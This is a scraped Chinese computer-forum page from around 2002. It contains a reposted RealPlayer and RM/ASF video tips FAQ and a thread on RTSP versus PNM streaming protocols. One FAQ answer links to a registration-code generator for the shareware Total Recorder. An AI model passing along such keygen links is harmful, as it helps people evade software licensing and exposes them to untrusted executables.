打开资源管理器，进入rm歌曲所在的目录，用鼠标选中了其中几首，敲下回车键，结果只有第一首歌被打开了，播放列表里仍然没有东西。我又想能不能直接用鼠标把所选歌曲一起拖到realplay的肚子里去呢？于是我先启动realplay（8.0版），然后再一次选中那几首歌，此时realplay已经最小化到任务栏上，我按住鼠标不放，拖动那几首歌到任务栏的realplay窗口图标上，稍候，realplay窗口自动被激活（最大化），我继续按着鼠标不放，移动到realplay的界面上，只见鼠标指针右下部立刻出现了一个加号，好兆头！我一松手――奇迹发生了，realplay的播放列表栏被激活，点击播放列表下拉菜单，可以看到我所选的歌目都排列在里面，而realplay已经开始依次播放它们了！怎么样，整个过程要不了５秒钟。（不过还没完，最后让我们到[晕倒死] 的temp文件夹里去看一下，你会发现这里多出来一个ram文件，用记事本打开它，就会发现里面依次排列着我们选中歌曲的路径。其实这个ram文件就是我们梦寐以求的那个realplay播放列表文件。你可以把它保存起来以便下次使用。

九。　如何把ASF格式转换为MPG格式

    首先我想先说明一下，除了本文介绍的方法外，你也可以用其它方法把 ASF 文件先转换为 AVI 格式的文件后，再用相应的软件把 AVI 转换成 MPG 格式。并不是说现在这个方法就是唯一的，请注意灵活变通！

    由于 ASF 视频格式的先天限制，所以它的图象质量总是比不上好的 VCD ，所以你在考虑到底转不转换成 MPG 格式前应该认真考虑清楚到底有没有这个必要。

    如何制作：

    首先你必须要有： DVMpeg 5.0+， VirtualDub 和 [晕倒死] Media Tools 这三个软件。

    请先安装 [晕倒死] Media Tools 和 DVMPEG，运行 VirtualDub 选择 File-＞Open 然后打开你想转换的 ASF 文件。

    注意：如果你不是把转换出来的 MPG 文件用来做 VCD 的话，请跳过接着下面的 resize （重新调整大小）这步 。

    选择 File-＞File InFORMation 来检查 ASF 文件的分辨率尺寸大小，如果显示出来的这个视频文件的分辨率是 320x240 25 fps 的话就要选择 Video-＞filter 来把分辨率转换到 352x288 。还有就是如果这个视频文件是 29.97/30 fps 的话，也请将它的分辨率调整为 352x240 。如果你确实要调整视频的分辨率的话，请在 Filter mode 这里选择 Precise bicubic 来确保生成作品的质量是最好的。

    选择 Audio-＞Compression 后选择 DVMpeg 的 DVMpeg Stereo Audio FORMat 立体声格式。

    选择 Audio-＞Conversion 后选中里面的 44100 Hz, 16 bit and Stereo.

    选择 Audio-＞Full Processing.

    选择 Video-＞Full Processing.

    选择 Video-＞Compression. 选中 DVMPEG 然后按 Configure.

    在 Stream Type 里面选择 Video CD 和 PAL 25 （如果这个 ASF 视频文件是 25fps 或者是 NTSC 格式的 29.97/30fps 的话），最后按下 OK 按钮。

    现在请选择 Select File-＞Save AVI 把你的AVI文件保存到任何一个文件夹，然后 DVMpeg 就会自动把它转换成 MPG 文件。

十。再谈rm视频文件的制作

    rm格式的视频文件因其体积小巧而十分流行，关于如何制作rm格式的视频文件，已有不少的文章进行过介绍。但就其内容而言均是大同小异，其过程基本都是先用超级解霸等工具将vcd的dat文件转换或抓取成avi格式的视频文件，再用real encoder或real producer将avi文件转换为我们需要的rm文件。但这样做至少有如下缺点：

    1.制作过程耗时太长，将一部90分钟的电影制作成rm格式一般需要4～5个小时。实在让人难以忍受。

    2.硬盘空间耗用巨大，2～3GB的空间占用是常有的事。不少朋友为了在自己有限的硬盘空间里制作rm文件,要么忍痛降低图像分辨率，要么提高avi文件的压缩程度，这对今后的播放效果影响是很大的，特别是全屏播放时，有的干脆把电影分成几段来制作,给播放带来不必要的麻烦。

    有没有更好的方法呢？答案是肯定的。这种方法是先将dat文件转换成mpeg文件，进而得到rm视频文件。具体XXXX作如下：

    首先，利用工具软件mpegtool v1.04将dat文件转成mpeg文件。该软件很容易在网上找到，而且是免费软件。该软件的主要作用有两个：一个是把dat格式的文件转换成mpeg格式，另一个是可用来分割mpeg文件。Mpegtool的使用方法十分简单，在“来源”找到要转换的dat文件，在“目的”中添上rm文件的文件名便可进行下一步了。

    如果需要，我们可以利用mpegtool对电影进行剪裁，方法也很简单，输入起始帧和结束帧或直接拖动刻度即可设定。

    还要注意，有些dat文件在转换后有无法播放的现象，可以点选special FORMat选项来解决。

    设定好后，点击“next”转换就开始了，一张VCD碟片只需几分钟。Mpeg文件大小与dat文件差不多，也就是几百兆字节。怎么样很酷吧！！！

    接下来，就要用real producer来压缩了。有些朋友可能会问：“real producer不可以用mpeg文件呀？”其实，这已经是历史了。试试real producer plus 8.0(version 8.0.0.45)吧！它可以很好的利用mpeg文件。过程和其他类型的文件一样，这里就不再赘述。需要注意的问题是：

    1.real producer的版本问题：早期的real producer是不支持mpeg的。还有一些共享的real producer版本只能支持每秒15帧，播放时画面不连贯。

    1.压缩设置问题：如果是在局域网中使用，可选择较高速率并将画面质量设置为最高。对于双语的影碟，音频一定要按双声道模式来处理。

    使用该方法制作rm文件使用时是原来的一半，硬盘空间有700～800M也就足够了。更重要的是可以在不将影片分成若干段的情况下获得质量很高的rm视频文件，播放效果和VCD十分接近。

十一。RealPlayer的使用技巧

.....

5、优化播放质量

    RealPlayer为了能争取更多的用户，在播放器对系统资源的利用率上做了限制。随着电脑配件价格的不断降低，大家的电脑硬件配置越来越高，建议电脑内存在64MB以上的用户可以对RealPlayer进行优化设置：选中“Play(播放)”菜单的“Perfect Play（完美播放）”选项，你会发现RealPlayer的播放质量有所有提高，画面更加清晰流畅！

    6、禁用StartCenter

    在你完成RealPlayer的安装后，在系统的工具兰终会自动出现一个RealPlayer的图标，这就是帮助你在网上接收视频节目的StartCenter，它的作用是在线时使RealPlayer保持能及时收到各种相关的信息。由于StartCenter在启动RealPlayer时会自动随机运行，但在离线使用RealPlayer却又毫无作用，所以不如禁用它，降低系统资源占用率。建议你选择RealPlayer的“View（浏览）”菜单中的“Preferences”（性能）选项，再点击“General（常规）”设置中“StartCenter”栏的“Settings”按钮，然后选中禁用StartCenter的选项。

十二。RealPlayer应用常见问题解答

注：此贴中所指RealPlayer软件为RealPlayer Plus 8.0中文完整版，如果你还没有的话，可去这儿下载：

http://www.wenchuan.com/htm/RealPlayer.htm

1.[晕倒死] 启动后，RealPlayer就自动运行，我用msconfig程序把它禁掉也不成功，请问怎样取消它的自动运行？
答：在RealPlayer中设置一下就行了。视图--＞首选项，在“常规”选项卡中点击StartCenter的“设置”按钮，在弹出的窗口中取消“启用StartCenter”选项。

2.安装RealPlayer后，双击MP3文件它就自动跳出来播放，可我更喜欢使用Winamp/超级解霸来播放，请问如何改回去？
答：运行RealPlayer，视图--＞首选项，找到“升级”选项卡，点击媒体类型的“自动恢复设置”按钮，在弹出的窗口中将最后两项Mpeg Audio和MP3 PlayLists取消，按两次“确定”按钮存储设置后关闭RealPlayer。然后运行Winamp，Options--＞Preferences，在File types中选择想与Winamp关联的文件类型，建议选中Register types on Winamp start项，这样即使别的软件修改了选定文件的关联类型，Winamp也能自动更正回来。如果使用超级解霸，最方便的办法就是卸载重装，或者只能手动修改文件关联了。

3.我在播放rm影碟时，常碰到声音在放，但画面却静止不动的情况，请问如何解决？
答：Real格式本来是为了在网上实时播放用的，压缩率非常高，如果在制作时出了错就没办法解决了。如果碟片文件本身没有问题，可以在RealPlayer中作一点简单设置改善效果：视图--＞首选项，找到“连接”选项卡，设置缓冲播放为“至少缓冲30秒才播放”，再找到“性能”选项卡，设置“剪辑高速缓存”，可以设置得大一些，比如我设为50M。

4.我买了张周星弛的经典全集，可它是张双语碟，国/粤语同时播放使我听不清楚影片的对白，请问在RealPlayer中如何XXXX作关掉一个声道？
答：如果rm影碟在制作时未将音频格式设置为立体声音乐，那除非将一个音箱拔掉，没有别的办法。而如果是立体声音频，可以用软件调节，RealPlayer自身不具备调节左右声道的功能，可以使用[晕倒死] 的自带功能：双击系统栏的小喇叭图标，将音量控制的均衡滑动条向左或向右拉即可。

5.我在用RealPlayer播放影碟时只能一个一个打开文件，非常麻烦，请问它有没有类似Winamp的列表播放功能？
答：RealPlayer未提供生成文件列表的菜单项，如果你不怕麻烦，可以这样做：用记事本新建一个文本文件，在其中键入类似以下内容：

file:f:\\01.rm file:f:\\02.rm file:f:\\03.rm

即格式为：file:[路径][文件名]，并存成以ram为扩展名的文件即可。相信大多数人（包括我在内）都不喜欢这个方法，另外还有一个方法：同时打开RealPlayer和资源管理器，在资源管理器中选择要播放的rm文件拖到RealPlayer的播放窗口即可，如果你要保存这个播放列表，在[晕倒死] Temp下找一下，会找到一个以tmp开头的ram文件，就是临时生成的播放列表，把它复制一份即可。

6.听说Winamp在加插件后也能播放rm影碟，请问在哪里下载？
答：《电脑报》上曾刊文说有一个叫Innover的Winamp插件可以，但我试了一下不行，后来在Winamp的主页上找到一个叫Tara的插件可以用。因为Winamp本身支持播放列表和左右声道的调节，所以安装这个插件后播放rm影碟确实很方便，但这个插件有个很大的Bug：不能使用全屏播放，否则就不能回到窗口播放了，除非关闭Winamp，另外它需要调用RealPlayer，所以RealPlayer不可不装。去这个网页下载Tara Audio Video for Winamp：http://www.winamp.com/customize/detail.jhtml?componentId=22143另外，由汉化人水手制作的可独立使用的Winamp 2.72全功能增强汉化程序也已内置了此插件的汉化版，下载地址：http://newhua.infosail.com/down/PWinamp272_PlusAll_SS.zip

7.请问如何将ra文件及rm文件中的音频转换为MP3文件格式？
答 ：曾听说有个叫Streambox Ripper的程序可以做到，就当下来试了一下，发现它已去除此功能，只能另想办法了。又在一些论坛上看到有网友说ra2wav软件可以，可是在网上没找到，后来在一个比较偶然的机会发现了这个软件：Total Recorder。这是一个录音软件，它有一个非常独特的功能：将别的软件通过声卡发出的声音录制下来，由于它的原理是使用了一个虚拟的声音设备，将别的软件输出的声音经此设备截取再传输到物理声卡上，所以实现了数码录音，无任何失真。

根据软件附带的帮助，它可以：
a.录制来自Internet的声音，包括流式音频（比如rm就是）；
b.录制来自游戏程序的声音；
c.录制用IP电话对话的声音。

Total Recorder 3.0版支持[晕倒死] 95/98/Me/NT/2000，并可直接将录制的音频存为MP3文件格式。这个功能是调用外部程序来实现的，在使用前要先设置一下：Options-Settings，找到MP3 encoding选项卡，在Select program for encoding to MP3下拉列表中选取要使用的压缩程序，如果你和我一样安装了JetAudio，只需选MPEG Layer-3 Codec (professional)即可。在设置好后，先按下该软件的录音按钮，再播放rm影碟，Total Recorder就会将声音录制下来。这个软件是共享软件，不注册的话最次只能录制40秒钟的声音。

下载Total Recorder 3.01：http://www.highcriteria.com/download/totre301.exe

下载Total Recorder 3.0注册码生成器：（3.01版仍可以用）http://202.103.100.253/hambo/othergroup19/dm_tre30.zip

8.请问如何截取rm影碟中的图像？
答：使用HyperSnap-DX软件，象截取DirectX游戏图像一样用法，先做一点设置：Capture--＞Enable Special Capture，选中以DirectX字样开头的两个选项，然后在播放rm影碟时按下Scroll Lock键即可，不管在RealPlayer中如何缩放，所截的图都是原始大小的。

9.我在网上看到一些在线播放的rm文件很不错，可用FlashGet下载的是一些很小的ram文件，并不是影片本身，请问该如何下载这些文件？
答；用记事本打开这些ram文件，你会看到一些以rstp开头的链接，这才是真实的影片所在地址，但用FlashGet等工具是无法下载的。在搜新网上曾见到一款叫Streambox VCR的软件，可把rm、ra、wma、asf等流文件下载到本地再播放，但因为要注册才能用，我还没试过，哪位朋友有兴趣可自行测试。另外还有一个比较“狠”的办法（因为比较“狠”所以也没试过），就是在影片播放完后立即按Reset重启电脑，再运行磁盘扫描程序将找到的内容存为文件就是影片了。下载Streambox VCR 1.0 Beta 3.1：http://run.i151.com/software/StreamBox_VCR10B31.zip

10.我觉得rm影碟很节省空间，便于收藏，想把VCD转换为这种格式，请问需要什么软件？
答：使用RealProducer制作，它可将wav、mov、avi、au、mpeg文件压制成Real影音文件(ra、rm、ram...)，如果要压缩VCD文件，则应先转换为mpg格式，可使用超级解霸、VCDCutter及免费的VCDGear来完成。

RealProducer Plus 8.5及其汉化版下载页面：

http://www.wenchuan.com/htm/RealProducer.htm

下载VCDCutter 4.03：

http://dl1.51soft.com/soft/97/vcdcutter403.zip

下载VCDGear 1.6d：

http://www.soft999.com/download2/vcdgear16d_win32.zip

VCDGear只能以DOS命令行方式调用，比如“VCDGear -dat2mpg 1.dat 1.mpg”即为将1.dat文件转换为1.mpg文件。

RealProducer的具体使用方法可参看这里：

http://www.cpcw.com/2000/03/00030907.htm

11.我想保存rm影碟中的某一片断，该如何实现？
答：用RealProducer软件就可以做到，File--＞Edit RealMedia File，在弹出的窗口中打开rm文件按屏幕显示进行XXXX作即可。

12.除RealPlayer和Winamp外，还有别的软件可以播放rm影碟吗？你觉得用哪个软件播放的效果最好？
答：据我所知，还有这些软件可以播放rm影碟：Media Jukebox、Cowon Jet-Audio、UltraPlayer以及实达铭泰的东方影都立体版。
Media Jukebox可播放各种多媒体格式的文件，功能强大，但它的播放列表功能使用困难，不推荐使用。
Cowon JetAudio 4.71版开始内置了RealPlayer G2播放引擎，这个软件有非常漂亮的界面和强大易用的专辑管理，并可对声音进行一些特殊处理，是一款极棒的软件，但它不能实现rm影碟的全屏播放，而且播放一些较新格式的rm影碟时还得调用RealPlayer 8的播放功能才行。

UltraPlayer可以播放流行的多媒体格式文件而且音质不错，它有一个独特的功能：设定在一段时间内播放音乐并逐渐减小或增大音量，可以用来播放催眠曲或提醒起床的音乐（外国人不关电脑吗？呵呵），它有简单易用的播放列表，可调节音量的左右均衡，但播放rm影碟画面只能在小窗口和全屏幕间切换，这个软件是免费的。

我没用过东方影都立体版，从一些电脑杂志和网上的文章来看，播放rm影碟的效果还不错，而且可以很方便的抓图。

说到效果，我觉得还是用RealPlayer播放比较好，在解决了播放列表和左右声道调节问题并做一些设置后，感觉还是用它更方便，而且别的软件大多数是调用它来播放rm影碟的，还不如就直接用它了。

RM-Fixer能对有某些损坏的RM电影文件进行修补。rmfix使用说明：要点：rmfix可能会对rm文件造成永久性损坏，所以在使用rmfix之前把要修复的rm文件做备份。第一种情况：一个完整的rm文件，但只能播放一部分：1：把rm文件拖拽到rmfix程序图标上(注：也可以命令行方式，例如："rmfix c:\\movie\\a.rm") 2：这时候rmfix会以dos模式运行并显示出一个菜单，按"A"键切换到自动修复模式。3：按"2"开始检查所有的数据块，rmfix开始扫描整个文件(需要扫描几分钟时间)4：当rmfix扫描到一个损坏的数据块的时候，扫描会暂停，按"Y"修复这个块。5：当数据块扫描全部结束时(按回车键回到主菜单)，按"5"开始重建索引数据(注：播放rm文件无法拖拽时间条就是因为索引数据出错) 现在这个rm文件就能够正常播放了。第二种情况：修复一个不完整的rm文件(例如一个没有下载完全的rm文件) 1：把rm文件拖拽到rmfix程序图标上(注：也可以命令行方式，例如："rmfix c:\\movie\\a.rm") 2：按"C"开始数据块扫描。3：当rmfix扫描到一个损坏的数据块的时候，扫描会暂停，按"Y"修复这个块。4：数据块扫描完成的时候rmfix程序结束，这时再次把rm文件拖拽到rmfix程序图标上。5：按"R"重建索引数据(有索引数据的rm文件在播放的时候才允许使用快进、重放、时间条拖放等控制功能)

以上为转载---------------

幕末 ——
京都に人斬り拔刀齋と呼ばれた志士がぃた.
修羅さながらに人を斬り.その血刀を以って新
時代『明治』を切り拓ぃたその男は.動亂の
終結と共に人々の前から姿を消した ——
上一贴 | 下一贴
快速回复 主题：请高手指点如何把在线试听的歌曲保留下来？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


关于real system的一个小问题 - 经 典 论 坛

计算机技术
关于real system的一个小问题

上一贴 | 下一贴
发表人 主题: 关于real system的一个小问题
kacji

终级用户
积分：1014
发帖：299
来自：活火熔城
注册：2001-08-14
 发表于 2002-02-21 12:33:32 按此观看kacji的个人资料 按此发邮件给kacji kacji 的 oicq 是156679,查看 156679 的资料 收藏该主题供以后查看 发送悄悄话给kacji 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kacji的IP
我看到一个ram文件的内容如下：

rtsp://210.77.152.234:554/encoder/cr3
--stop--
pnm://210.77.152.234:7070/encoder/cr3

这中间的-stop-是什么意思？
还有rtsp和pnm这两种流媒体播放协议有什么异同？？
谢谢

我要让这天，再遮不住我眼
我要让这地，再埋不了我心
我要让众生，都明白我意
我要让诸佛，皆烟消云散
sunjune

初级用户
积分：113
发帖：29
来自：
注册：2002-02-01
 发表于 2002-02-21 23:18:24 按此观看sunjune的个人资料 按此发邮件给sunjune sunjune 的 oicq 是1871284,查看 1871284 的资料 发送悄悄话给sunjune 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sunjune的IP
［转贴］

实时流协议RTSP

    实时流协议RTSP(RealTimeStreamingProtocol)是由RealNetworks和Netscape共同提出的，该协议定义了一对多应用程序如何有效地通过IP网络传送多媒体数据。RTSP在体系结构上位于RTP和RTCP之上，它使用TCP或RTP完成数据传输。HTTP与RTSP相比，HTTP传送HTML，而RTP传送的是多媒体数据。HTTP请求由客户机发出，服务器作出响应；使用RTSP时，客户机和服务器都可以发出请求，即RTSP可以是双向的。

6.3 RTSP协议
   实时流协议（RTSP）是应用级协议，控制实时数据的发送。RTSP提供了一个可扩展框架，使实时数据，如音频与视频，的受控、点播成为可能。数据源包括现场数据与存储在剪辑中数据。该协议目的在于控制多个数据发送连接，为选择发送通道，如UDP、组播UDP与TCP，提供途径，并为选择基于RTP上发送机制提供方法。
   6.3.1 简介
   6.3.1.1 目的
   实时流协议（RTSP）建立并控制一个或几个时间同步的连续流媒体。尽管连续媒体流与控制流交叉是可能的，通常它本身并不发送连续流。换言之，RTSP充当多媒体服务器的网络远程控制。RTSP连接没有绑定到传输层连接，如TCP。在RTSP连接期间，RTSP用户可打开或关闭多个对服务器的可靠传输连接以发出RTSP 请求。此外，可使用无连接传输协议，如UDP。RTSP流控制的流可能用到RTP，但RTSP操作并不依赖用于携带连续媒体的传输机制。实时流协议在语法和操作上与HTTP/1.1类似，因此HTTP的扩展机制大都可加入RTSP。协议支持的操作如下：
   从媒体服务器上检索媒体：
   用户可通过HTTP或其它方法提交一个演示描述。如演示是组播，演示式就包含用于连续媒体的的组播地址和端口。如演示仅通过单播发送给用户，用户为了安全应提供目的地址。
   媒体服务器邀请进入会议：
   媒体服务器可被邀请参加正进行的会议，或回放媒体，或记录其中一部分，或全部。这种模式在分布式教育应用上很有用，会议中几方可轮流按远程控制按钮。
   将媒体加到现成讲座中：
   如服务器告诉用户可获得附加媒体内容，对现场讲座显得尤其有用。如HTTP/1.1中类似，RTSP请求可由代理、通道与缓存处理。

   6.3.1.2 协议特点
   RTSP 特性如下：
   可扩展性：
   新方法和参数很容易加入RTSP。
   易解析：
   RTSP可由标准 HTTP或MIME解吸器解析。
   安全：
   RTSP使用网页安全机制。
   独立于传输：
   RTSP可使用不可靠数据报协议（UDP）、可靠数据报协议（RDP），如要实现应用级可靠，可使用可靠流协议。
   多服务器支持：
   每个流可放在不同服务器上，用户端自动同不同服务器建立几个并发控制连接，媒体同步在传输层执行。
   记录设备控制：
   协议可控制记录和回放设备。
   流控与会议开始分离：
   仅要求会议初始化协议提供，或可用来创建唯一会议标识号。特殊情况下， SIP或H.323
   可用来邀请服务器入会。
   适合专业应用：
   通过SMPTE 时标，RTSP支持帧级精度，允许远程数字编辑
   演示描述中立：
   协议没强加特殊演示或元文件，可传送所用格式类型；然而，演示描述至少必须包含一个RTSP URI。
   代理与防火墙友好：
   协议可由应用和传输层防火墙处理。防火墙需要理解SETUP方法，为UDP媒体流打开一个"缺口"。
   HTTP友好：
   此处，RTSP明智的采用HTTP观念，使现在结构都可重用。结构包括Internet 内容选择平台（PICS）。由于在大多数情况下控制连续媒体需要服务器状态， RTSP不仅仅向HTTP 添加方法。
   适当的服务器控制：
   如用户启动一个流，他必须也可以停止一个流。
   传输协调；
   实际处理连续媒体流前，用户 可协调传输方法。
   性能协调：
   如基本特征无效，必须有一些清理机制让用户决定那种方法没生效。这允许用户提出适合的用户界面。
   6.3.1.3扩展RTSP
   由于不是所有媒体服务器有着相同的功能，媒体服务器有必要支持不同请求集。RTSP 可以如下三种方式扩展，这里以改变大小排序：
   以新参数扩展。如用户需要拒绝通知，而方法扩展不支持，相应标记就加入要求的段中。
   加入新方法。如信息接收者不理解请求，返回501错误代码（还未实现），发送者不应再次尝试这种方法。用户可使用OPTIONS方法查询服务器支持的方法。服务器使用公共响应头列出支持的方法。
   定义新版本协议，允许改变所有部分。（除了协议版本号位置）
   6.3.1.4操作模式
   每个演示和媒体流可用RTSP URL识别。演示组成的整个演示与媒体属性由演示描述文件定义。使用HTTP或其它途径用户可获得这个文件，它没有必要保存在媒体服务器上。
   为了说明，假设演示描述描述了多个演示，其中每个演示维持了一个公共时间轴。为简化说明，且不失一般性，假定演示描述的确包含这样一个演示。演示可包含多个媒体流。除媒体参数外，网络目标地址和端口也需要决定。下面区分几种操作模式：
   单播：
   以用户选择的端口号将媒体发送到RTSP请求源。
   组播，服务器选择地址：
   媒体服务器选择组播地址和端口，这是现场直播或准点播常用的方式。
   组播，用户选择地址：
   如服务器加入正在进行的组播会议，组播地址、端口和密匙由会议描述给出。
   6.3.1.5 RTSP状态
   RTSP控制通过单独协议发送的流，与控制通道无关。例如，RTSP控制可通过TCP连接，而数据流通过UDP。因此，即使媒体服务器没有收到请求，数据也会继续发送。在连接生命期，单个媒体流可通过不同TCP连接顺序发出请求来控制。所以，服务器需要维持能联系流与RTSP请求的连接状态。RTSP中很多方法与状态无关，但下列方法在定义服务器流资源的分配与应用上起着重要的作用：
   SETUP：
   让服务器给流分配资源，启动RTSP连接。
   PLAY与RECORD：
   启动SETUP 分配流的数据传输。
   PAUSE：
   临时停止流，而不释放服务器资源。
   TEARDOWN：
   释放流的资源，RTSP连接停止。
   标识状态的RTSP方法使用连接头段识别RTSP连接，为响应SETUP请求，服务器连
   接产生连接标识。

   6.3.1.6 与其他协议关系
   RTSP在功能上与HTTP有重叠，与HTTP相互作用体现在与流内容的初始接触是通过网页的。目前的协议规范目的在于允许在网页服务器与实现RTSP媒体服务器之间存在不同传递点。例如，演示描述可通过HTTP和RTSP检索，这降低了浏览器的往返传递，也允许独立RTSP 服务器与用户不全依靠HTTP。
   但是，RTSP与HTTP 的本质差别在于数据发送以不同协议进行。HTTP是不对称协议，用户发出请求，服务器作出响应。RTSP中，媒体用户和服务器都可发出请求，且其请求都是无状态的；在请求确认后很长时间内，仍可设置参数，控制媒体流。重用HTTP功能至少在两个方面有好处，即安全和代理。要求非常接近，在缓存、代理和授权上采用HTTP功能是有价值的。
   当大多数实时媒体使用RTP作为传输协议时，RTSP没有绑定到RTP。RTSP假设存在演示描述格式可表示包含几个媒体流的演示的静态与临时属性。

   6.3.2 协议参数

   6.3.3 RTSP 信息
   RTSP是基于文本的协议，采用ISO 10646 字符集，使用UTF-8编码方案。行以CRLF中断，但接收者本身可将CR和LF解释成行终止符。基于文本的协议使以自描述方式增加可选参数更容易。由于参数的数量和命令的频率出现较低，处理效率没引起注意。如仔细研究，文本协议很容易以脚本语言（如：Tcl、Visual Basic与Perl）实现研究原型。
   10646字符集避免敏感字符集切换，但对应用来说不可见。RTCP也采用这种编码方案。带有重要意义位的ISO 8859-1字符表示如100001x 10xxxxxx.。RTSP信息可通过任何低层传输协议携带。
   请求包括方法、方法作用于其上的对象和进一步描述方法的参数。方法也可设计为在服务器端只需要少量或不需要状态维护。当信息体包含在信息中，信息体长度有如下因素决定：
   不管实体头段是否出现在信息中，不包括信息体的的响应信息总以头段后第一和空行结束。
   如出现内容长度头段，其值以字节计，表示信息体长度。如未出现头段，其值为零。
   服务器关闭连接。
   注意：RTSP目前并不支持HTTP/1.1"块"传输编码，需要有内容长度头。假如返回适度演示描述长度，即使动态产生，使块传输编码没有必要，服务器也应该能决定其长度。如有实体，即使必须有内容长度，且长度没显式给出，规则可确保行为合理。
   从用户到服务器端的请求信息在第一行内包括源采用的方法、源标识和所用协议版本。RTSP定义了附加状态代码，而没有定义任何HTTP代码。
   6.3.4 实体
   如不受请求方法或响应状态编码限制，请求和响应信息可传输实体，实体由实体头文件和试题体组成，有些响应仅包括实体头。在此，根据谁发送实体、谁接收实体，发送者和接收者可分别指用户和服务器。
   实体头定义实体体可选元信息，如没有实体体，指请求标识的资源。扩展头机制允许定义附加实体头段，而不用改变协议，但这些段不能假定接收者能识别。不可识别头段应被接收者忽略，而让代理转发。
   6.3.5 连接
   RTSP请求可以几种不同方式传送：
   1、持久传输连接，用于多个请求/响应传输。
   2、每个请求/响应传输一个连接。
   3、无连接模式。
   传输连接类型由RTSP URI来定义。对 "rtsp" 方案，需要持续连接；而"rtspu"方案，调用RTSP 请求发送，而不用建立连接。
   不象HTTP，RTSP允许媒体服务器给媒体用户发送请求。然而，这仅在持久连接时才支持，否则媒体服务器没有可靠途径到达用户，这也是请求通过防火墙从媒体服务器传到用户的唯一途径。
   6.3.6 方法定义
   方法记号表示资源上执行的方法，它区分大小写。新方法可在将来定义，但不能以$开头。
   某些防火墙设计与其他环境可能要求服务器插入RTSP方法和流数据。由于插入将使客户端和服务器操作复杂，并强加附加开销，除非有必要，应避免这样做。插入二进制数据仅在RTSP通过TCP传输时才可使用。流数据（如RTP包）用一个ASCII美圆符号封装，后跟一个一字节通道标识，其后是封装二进制数据的长度，两字节整数。流数据紧跟其后，没有CRLF，但包括高层协议头。每个$块包含一个高层协议数据单元。
   当传输选择为RTP，RTCP信息也被服务器通过TCP连接插入。缺省情况下，RTCP包在比RTP通道高的第一个可用通道上发送。客户端可能在另一通道显式请求RTCP包 ，这可通过指定传输头插入参数中的两个通道来做到。当两个或更多流交叉时，为取得同步，需要RTCP。而且，这为当网络设置需要通过TCP控制连接透过RTP/RTCP提供了一条方便的途径，可能时，在UDP上进行传输。
   6.3.7 流水线操作
   支持持久连接或无连接的客户端可能给其请求排队。服务器必须以收到请求的同样顺序发出响应。如果请求不是发送给组播组，接收者就确认请求，如没有确认信息，发送者可在超过一个来回时间（RTT）后重发同一信息。
   RTT在TCP中估计，初始值为500 ms。应用缓存最后所测量的RTT，作为将来连接的初始值。如使用一个可靠传输协议传输RTSP，请求不允许重发，RTSP应用反过来依赖低层传输提供可靠性。如两个低层可靠传输（如TCP 和RTSP）应用重发请求，有可能每个包损失导致两次重传。由于传输栈在第一次尝试到达接收着者前不会发送应用层重传，接收者也不能充分利用应用层重传。如包损失由阻塞引起，不同层的重发将使阻塞进一步恶化。时标头用来避免重发模糊性问题，避免对圆锥算法的依赖。每个请求在CSeq头中携带一个系列号，每发送一个不同请求，它就加一。如由于没有确认而重发请求，请求必须携带初始系列号。
   实现RTSP的系统必须支持通过TCP传输RTSP ，并支持UDP。对UDP和TCP，RTSP服务器的缺省端口都是554。许多目的一致的RTSP包被打包成单个低层PDU或TCP流。RTSP数据可与RTP和RTCP包交叉。不象HTTP，RTSP信息必须包含一个内容长度头，无论信息何时包含负载。否则，RTSP包以空行结束，后跟最后一个信息头。

wx@ay

看不懂
积分：7424
发帖：5353
来自：ay.ha.cn
注册：1999-12-23
 发表于 2002-02-22 12:23:03 wx@ay 的 oicq 是1850777,查看 1850777 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
看来经典玩REAL的人不多啊
我也想知道的

根据我的理解，RTSP多用于一般的流式播放，PNM多用于音频的直播。
RTSP使用RTSP协议，PNM使用的是PNA协议。
不知道对否？

Think like a Genius.

有些爱情象指甲，有些象牙齿。
指甲能不断生长，不要的就剪掉。
而牙齿就不同。
象牙齿的爱情会不同，它会永远！
小心蛀牙！！！

kacji

终级用户
积分：1014
发帖：299
来自：活火熔城
注册：2001-08-14
 发表于 2002-02-22 13:23:28 按此观看kacji的个人资料 按此发邮件给kacji kacji 的 oicq 是156679,查看 156679 的资料 发送悄悄话给kacji 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kacji的IP
谢谢诸位:-)
还有一个问题，我要做一个小区宽带网中心机房的VOD系统的设计和构建工作，全部基于WEB的。我想用Real Server构建其中的流媒体服务器，谁知道支持1000个并发连接的lic需要多少money？在windows2k server中支持得了吗？
要是太贵，就只好退而求其次用Windows media server了。
唉，这个问题弄得我的策划书都不敢交啊。

我要让这天，再遮不住我眼
我要让这地，再埋不了我心
我要让众生，都明白我意
我要让诸佛，皆烟消云散
wx@ay

看不懂
积分：7424
发帖：5353
来自：ay.ha.cn
注册：1999-12-23
 发表于 2002-02-22 13:28:09 wx@ay 的 oicq 是1850777,查看 1850777 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
kacji在上个帖子中说
引用:
要是太贵，就只好退而求其次用Windows media server了。

就用它吧，简单，又不花钱，领导高兴

Think like a Genius.

有些爱情象指甲，有些象牙齿。
指甲能不断生长，不要的就剪掉。
而牙齿就不同。
象牙齿的爱情会不同，它会永远！
小心蛀牙！！！

上一贴 | 下一贴
快速回复 主题：关于real system的一个小问题
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


为何听不了CD音乐？ - 经 典 论 坛

计算机技术
为何听不了CD音乐？

上一贴 | 下一贴
发表人 | 主题: 为何听不了CD音乐？
